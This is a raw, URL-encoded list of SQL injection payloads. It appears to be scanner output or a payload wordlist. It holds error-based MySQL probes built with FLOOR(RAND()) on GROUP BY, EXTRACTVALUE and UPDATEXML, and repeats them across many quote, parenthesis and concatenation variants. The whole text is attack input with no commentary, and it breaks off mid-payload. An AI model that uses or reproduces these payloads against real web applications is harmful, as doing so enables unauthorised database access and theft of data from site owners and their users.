1%29%20AND%20%28SELECT%207845%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%287845%3D7845%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%281767%3D1767 1%29%29%20AND%20%28SELECT%207845%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%287845%3D7845%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%285892%3D5892 1%29%29%29%20AND%20%28SELECT%207845%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%287845%3D7845%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%28%285247%3D5247 1%20AND%20%28SELECT%207845%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%287845%3D7845%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29 1%27%29%20AND%20%28SELECT%207845%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%287845%3D7845%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%27kPkV%27%3D%27kPkV 1%27%29%29%20AND%20%28SELECT%207845%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%287845%3D7845%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%28%27MaYy%27%3D%27MaYy 1%27%29%29%29%20AND%20%28SELECT%207845%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%287845%3D7845%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%28%28%27QVTS%27%3D%27QVTS 1%27%20AND%20%28SELECT%207845%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%287845%3D7845%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27kbKC%27%3D%27kbKC 1%27%29%20AND%20%28SELECT%207845%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%287845%3D7845%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%27zbqG%27%20LIKE%20%27zbqG 1%27%29%29%20AND%20%28SELECT%207845%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%287845%3D7845%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%28%27CQGp%27%20LIKE%20%27CQGp 1%27%29%29%29%20AND%20%28SELECT%207845%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%287845%3D7845%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%28%28%27btOn%27%20LIKE%20%27btOn 1%27%20AND%20%28SELECT%207845%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%287845%3D7845%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27OBdn%27%20LIKE%20%27OBdn 1%22%29%20AND%20%28SELECT%207845%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%287845%3D7845%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%22Pvve%22%3D%22Pvve 1%22%29%29%20AND%20%28SELECT%207845%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%287845%3D7845%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%28%22aOkL%22%3D%22aOkL 1%22%29%29%29%20AND%20%28SELECT%207845%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%287845%3D7845%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%28%28%22BfJH%22%3D%22BfJH 1%22%20AND%20%28SELECT%207845%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%287845%3D7845%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%22LtCv%22%3D%22LtCv 1%22%29%20AND%20%28SELECT%207845%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%287845%3D7845%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%22WDCf%22%20LIKE%20%22WDCf 1%22%29%29%20AND%20%28SELECT%207845%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%287845%3D7845%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%28%22qDCf%22%20LIKE%20%22qDCf 1%22%29%29%29%20AND%20%28SELECT%207845%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%287845%3D7845%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%28%28%22wOcK%22%20LIKE%20%22wOcK 1%22%20AND%20%28SELECT%207845%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%287845%3D7845%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%22tecX%22%20LIKE%20%22tecX 1%29%20WHERE%202523%3D2523%20AND%20%28SELECT%207845%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%287845%3D7845%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29 1%27%29%20WHERE%205456%3D5456%20AND%20%28SELECT%207845%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%287845%3D7845%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29 1%27%20WHERE%209006%3D9006%20AND%20%28SELECT%207845%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%287845%3D7845%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29 1%22%20WHERE%204870%3D4870%20AND%20%28SELECT%207845%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%287845%3D7845%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29 1%27%20%7C%7C%20%28SELECT%207282%20FROM%20DUAL%20WHERE%209493%3D9493%20AND%20%28SELECT%207845%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%287845%3D7845%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%202989%20WHERE%205039%3D5039%20AND%20%28SELECT%207845%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%287845%3D7845%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20%29%20%7C%7C%20%27 1%20%2B%20%28SELECT%208697%20FROM%20DUAL%20WHERE%201886%3D1886%20AND%20%28SELECT%207845%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%287845%3D7845%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20%29 1%20%2B%20%28SELECT%201208%20WHERE%202252%3D2252%20AND%20%28SELECT%207845%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%287845%3D7845%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20%29 1%27%20%2B%20%28SELECT%20%27jWRh%27%20FROM%20DUAL%20WHERE%208423%3D8423%20AND%20%28SELECT%207845%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%287845%3D7845%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27yVyM%27%20WHERE%204153%3D4153%20AND%20%28SELECT%207845%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%287845%3D7845%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20%29%20%2B%20%27 1%27%20IN%20BOOLEAN%20MODE%29%20AND%20%28SELECT%207845%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%287845%3D7845%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20%23 1%29%20AND%20EXTRACTVALUE%287103%2CCONCAT%280x5c%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%287103%3D7103%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%29 1%27%29%20AND%20EXTRACTVALUE%287103%2CCONCAT%280x5c%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%287103%3D7103%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%29 1%27%20AND%20EXTRACTVALUE%287103%2CCONCAT%280x5c%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%287103%3D7103%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%29 1%22%20AND%20EXTRACTVALUE%287103%2CCONCAT%280x5c%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%287103%3D7103%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%29 1%29%20AND%20EXTRACTVALUE%287103%2CCONCAT%280x5c%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%287103%3D7103%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%29%20AND%20%285892%3D5892 1%29%29%20AND%20EXTRACTVALUE%287103%2CCONCAT%280x5c%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%287103%3D7103%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%29%20AND%20%28%283294%3D3294 1%29%29%29%20AND%20EXTRACTVALUE%287103%2CCONCAT%280x5c%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%287103%3D7103%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%29%20AND%20%28%28%288082%3D8082 1%20AND%20EXTRACTVALUE%287103%2CCONCAT%280x5c%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%287103%3D7103%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%29 1%27%29%20AND%20EXTRACTVALUE%287103%2CCONCAT%280x5c%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%287103%3D7103%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%29%20AND%20%28%27hwma%27%3D%27hwma 1%27%29%29%20AND%20EXTRACTVALUE%287103%2CCONCAT%280x5c%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%287103%3D7103%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%29%20AND%20%28%28%27WRrX%27%3D%27WRrX 1%27%29%29%29%20AND%20EXTRACTVALUE%287103%2CCONCAT%280x5c%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%287103%3D7103%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%29%20AND%20%28%28%28%27Uhyr%27%3D%27Uhyr 1%27%20AND%20EXTRACTVALUE%287103%2CCONCAT%280x5c%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%287103%3D7103%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%29%20AND%20%27iZyS%27%3D%27iZyS 1%27%29%20AND%20EXTRACTVALUE%287103%2CCONCAT%280x5c%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%287103%3D7103%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%29%20AND%20%28%27NXCW%27%20LIKE%20%27NXCW 1%27%29%29%20AND%20EXTRACTVALUE%287103%2CCONCAT%280x5c%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%287103%3D7103%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%29%20AND%20%28%28%27EHQp%27%20LIKE%20%27EHQp 1%27%29%29%29%20AND%20EXTRACTVALUE%287103%2CCONCAT%280x5c%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%287103%3D7103%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%29%20AND%20%28%28%28%27jSxe%27%20LIKE%20%27jSxe 1%27%20AND%20EXTRACTVALUE%287103%2CCONCAT%280x5c%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%287103%3D7103%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%29%20AND%20%27YpTW%27%20LIKE%20%27YpTW 1%22%29%20AND%20EXTRACTVALUE%287103%2CCONCAT%280x5c%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%287103%3D7103%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%29%20AND%20%28%22DxKG%22%3D%22DxKG 1%22%29%29%20AND%20EXTRACTVALUE%287103%2CCONCAT%280x5c%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%287103%3D7103%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%29%20AND%20%28%28%22rOnf%22%3D%22rOnf 1%22%29%29%29%20AND%20EXTRACTVALUE%287103%2CCONCAT%280x5c%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%287103%3D7103%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%29%20AND%20%28%28%28%22avRW%22%3D%22avRW 1%22%20AND%20EXTRACTVALUE%287103%2CCONCAT%280x5c%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%287103%3D7103%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%29%20AND%20%22TsVk%22%3D%22TsVk 1%22%29%20AND%20EXTRACTVALUE%287103%2CCONCAT%280x5c%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%287103%3D7103%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%29%20AND%20%28%22flQB%22%20LIKE%20%22flQB 1%22%29%29%20AND%20EXTRACTVALUE%287103%2CCONCAT%280x5c%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%287103%3D7103%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%29%20AND%20%28%28%22qxDY%22%20LIKE%20%22qxDY 1%22%29%29%29%20AND%20EXTRACTVALUE%287103%2CCONCAT%280x5c%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%287103%3D7103%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%29%20AND%20%28%28%28%22mmPc%22%20LIKE%20%22mmPc 1%22%20AND%20EXTRACTVALUE%287103%2CCONCAT%280x5c%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%287103%3D7103%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%29%20AND%20%22Mffa%22%20LIKE%20%22Mffa 1%29%20WHERE%202733%3D2733%20AND%20EXTRACTVALUE%287103%2CCONCAT%280x5c%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%287103%3D7103%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%29 1%27%29%20WHERE%206776%3D6776%20AND%20EXTRACTVALUE%287103%2CCONCAT%280x5c%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%287103%3D7103%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%29 1%27%20WHERE%203559%3D3559%20AND%20EXTRACTVALUE%287103%2CCONCAT%280x5c%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%287103%3D7103%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%29 1%22%20WHERE%206820%3D6820%20AND%20EXTRACTVALUE%287103%2CCONCAT%280x5c%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%287103%3D7103%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%29 1%27%20%7C%7C%20%28SELECT%201767%20FROM%20DUAL%20WHERE%207474%3D7474%20AND%20EXTRACTVALUE%287103%2CCONCAT%280x5c%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%287103%3D7103%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%29%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%202542%20WHERE%201395%3D1395%20AND%20EXTRACTVALUE%287103%2CCONCAT%280x5c%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%287103%3D7103%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%29%20%29%20%7C%7C%20%27 1%20%2B%20%28SELECT%203934%20FROM%20DUAL%20WHERE%206498%3D6498%20AND%20EXTRACTVALUE%287103%2CCONCAT%280x5c%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%287103%3D7103%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%29%20%29 1%20%2B%20%28SELECT%208264%20WHERE%204395%3D4395%20AND%20EXTRACTVALUE%287103%2CCONCAT%280x5c%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%287103%3D7103%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%29%20%29 1%27%20%2B%20%28SELECT%20%27nLAV%27%20FROM%20DUAL%20WHERE%208418%3D8418%20AND%20EXTRACTVALUE%287103%2CCONCAT%280x5c%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%287103%3D7103%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%29%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27zNrG%27%20WHERE%201380%3D1380%20AND%20EXTRACTVALUE%287103%2CCONCAT%280x5c%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%287103%3D7103%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%29%20%29%20%2B%20%27 1%27%20IN%20BOOLEAN%20MODE%29%20AND%20EXTRACTVALUE%287103%2CCONCAT%280x5c%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%287103%3D7103%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%29%20%23 1%29%20AND%20UPDATEXML%281167%2CCONCAT%280x2e%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%281167%3D1167%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%2C4486%29 1%27%29%20AND%20UPDATEXML%281167%2CCONCAT%280x2e%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%281167%3D1167%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%2C4486%29 1%27%20AND%20UPDATEXML%281167%2CCONCAT%280x2e%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%281167%3D1167%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%2C4486%29 1%22%20AND%20UPDATEXML%281167%2CCONCAT%280x2e%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%281167%3D1167%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%2C4486%29 1%29%20AND%20UPDATEXML%281167%2CCONCAT%280x2e%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%281167%3D1167%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%2C4486%29%20AND%20%285207%3D5207 1%29%29%20AND%20UPDATEXML%281167%2CCONCAT%280x2e%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%281167%3D1167%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%2C4486%29%20AND%20%28%287627%3D7627 1%29%29%29%20AND%20UPDATEXML%281167%2CCONCAT%280x2e%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%281167%3D1167%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%2C4486%29%20AND%20%28%28%285297%3D5297 1%20AND%20UPDATEXML%281167%2CCONCAT%280x2e%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%281167%3D1167%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%2C4486%29 1%27%29%20AND%20UPDATEXML%281167%2CCONCAT%280x2e%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%281167%3D1167%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%2C4486%29%20AND%20%28%27sxNJ%27%3D%27sxNJ 1%27%29%29%20AND%20UPDATEXML%281167%2CCONCAT%280x2e%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%281167%3D1167%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%2C4486%29%20AND%20%28%28%27tClP%27%3D%27tClP 1%27%29%29%29%20AND%20UPDATEXML%281167%2CCONCAT%280x2e%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%281167%3D1167%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%2C4486%29%20AND%20%28%28%28%27iktF%27%3D%27iktF 1%27%20AND%20UPDATEXML%281167%2CCONCAT%280x2e%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%281167%3D1167%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%2C4486%29%20AND%20%27Enog%27%3D%27Enog 1%27%29%20AND%20UPDATEXML%281167%2CCONCAT%280x2e%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%281167%3D1167%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%2C4486%29%20AND%20%28%27Gfda%27%20LIKE%20%27Gfda 1%27%29%29%20AND%20UPDATEXML%281167%2CCONCAT%280x2e%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%281167%3D1167%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%2C4486%29%20AND%20%28%28%27wCwc%27%20LIKE%20%27wCwc 1%27%29%29%29%20AND%20UPDATEXML%281167%2CCONCAT%280x2e%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%281167%3D1167%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%2C4486%29%20AND%20%28%28%28%27MmJg%27%20LIKE%20%27MmJg 1%27%20AND%20UPDATEXML%281167%2CCONCAT%280x2e%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%281167%3D1167%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%2C4486%29%20AND%20%27aNov%27%20LIKE%20%27aNov 1%22%29%20AND%20UPDATEXML%281167%2CCONCAT%280x2e%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%281167%3D1167%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%2C4486%29%20AND%20%28%22WfEc%22%3D%22WfEc 1%22%29%29%20AND%20UPDATEXML%281167%2CCONCAT%280x2e%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%281167%3D1167%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%2C4486%29%20AND%20%28%28%22nAOX%22%3D%22nAOX 